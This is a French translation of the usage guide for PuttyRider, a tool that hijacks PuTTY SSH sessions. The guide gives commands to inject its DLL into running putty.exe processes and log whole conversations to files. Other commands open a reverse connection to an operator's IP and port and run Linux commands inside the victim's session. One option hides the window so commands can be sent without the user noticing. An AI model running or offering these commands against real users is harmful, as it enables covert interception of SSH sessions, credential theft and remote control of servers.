
Détourner des sessions Putty pour sniffer la conversation et injecter des commandes Linux.
Détournez les sessions Putty pour renifler la conversation et injecter des commandes Linux.
Liste les processus Putty existants et leur état (injecté / non injecté)
PuttyRider.exe -l
Injecte la DLL dans le premier putty.exe trouvé et initie une connexion inverse de la DLL vers mon IP:Port, puis quitte PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
S'exécute en arrière-plan et attend de nouveaux processus Putty. Injecte dans tout nouveau putty.exe et écrit toutes les conversations dans des fichiers locaux.
PuttyRider.exe -w -f
Éjecte PuttyRider.dll de tous les processus Putty où elle est déjà injectée. (N'oubliez pas de tuer PuttyRider.exe si vous êtes en mode -w, sinon il réinjectera à nouveau.)
PuttyRider.exe -x
Modes d'opération :
-l Liste les processus Putty en cours et leurs connexions
-w Injecte dans toutes les sessions Putty existantes et attend les nouvelles sessions
pour également injecter dans celles-ci
-p PID Injecte uniquement dans la session Putty existante identifiée par le PID.
Si PID==0, injecte dans le premier Putty trouvé
-x Nettoyage. Supprime la DLL de toutes les instances Putty en cours
-d Mode débogage. Fonctionne uniquement avec le mode -p
-c CMD Exécute automatiquement une commande Linux après une injection réussie.
PuttyRider supprimera les espaces de fin et le caractère '&' de la commande.
PuttyRider ajoutera : " 1>/dev/null 2>/dev/null &" à la commande
-h Affiche cette aide
Modes de sortie :
-f Écrit toute la conversation Putty dans un fichier dans le répertoire local.
Le nom du fichier aura le PID du putty.exe actuel ajouté
-r IP:PORT Initie une connexion inverse vers la machine spécifiée et
démarre une session interactive.
Commandes interactives (après avoir reçu une connexion inverse) :
!status Voir si la fenêtre Putty est connectée à l'entrée utilisateur
!discon Déconnecte la fenêtre principale Putty pour qu'elle n'affiche rien.
Ceci est utile pour envoyer des commandes sans que l'utilisateur ne s'en aperçoive
!recon Reconnecte la fenêtre Putty à son mode de fonctionnement normal
CMD Commandes shell Linux
!exit Termine cette connexion
!help Affiche l'aide pour la connexion client
Utilisez l'invite de commandes Visual Studio :
nmake main dll
Remerciements à Brett Moore de Insomnia Security pour sa preuve de concept PuttyHijack